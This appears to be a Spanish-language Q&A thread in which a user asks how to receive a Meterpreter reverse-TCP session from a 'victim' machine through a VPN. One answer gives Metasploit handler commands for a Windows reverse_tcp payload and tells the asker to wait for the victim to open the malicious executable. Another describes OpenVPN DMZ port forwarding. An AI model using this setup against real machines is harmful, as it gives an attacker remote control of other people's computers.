sesión de Meterpreter a través de VPN

5

Tengo la siguiente situación:

Máquina atacante conectada a un enrutador con IP pública asignada desde ISP, reenvío habilitado.

La máquina víctima se conectó a otro enrutador, (obviamente) se asignó una IP diferente de un ISP diferente.

Quiero establecer una sesión de meterpreter con reversa tcp. Creo un archivo ejecutable de carga con msfvenom que da el IP público del enrutador del atacante como parámetro LHOST, luego comienzo a que el oyente configure la IP local de la máquina del atacante como LHOST.

Hasta aquí no hay problema.

Intenté hacer lo mismo con la máquina atacante conectada a un servidor VPN de creación propia sin éxito. ¿Es posible hacer esto?

Si es así, ¿qué direcciones IP tengo que configurar tanto en la carga útil como en la escucha para que funcione?

    
pregunta MKay 31.03.2016 - 15:48
fuente

2 respuestas

2

Si está utilizando un shell inverso, debe configurar LHOST con la IP de VPN del atacante, no su IP de LAN interna. También necesita escuchar localmente con Metasploit un puerto específico que debe configurar en LPORT y debe ser el mismo de msfvenom (es. 443). Para lograrlo puedes usar:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your_vpn_ip
set LPORT your_local_port
exploit

Luego, solo espera a que la víctima abra tu archivo ejecutable malintencionado

    
respondido por el Cricco95 31.03.2016 - 20:22
fuente
0

Sí, es posible si está utilizando openvpn. Podrías configurar un dmz. Openvpn tiene la capacidad de hacerlo. Una vpn public ip puede reenviar puertos a sus clientes si está configurada con dmz. Debe establecer la IP de su VPN y no su IP de cliente interno como LHOST

    
respondido por el Tim Jonas 31.03.2016 - 20:14
fuente

Lea otras preguntas en las etiquetas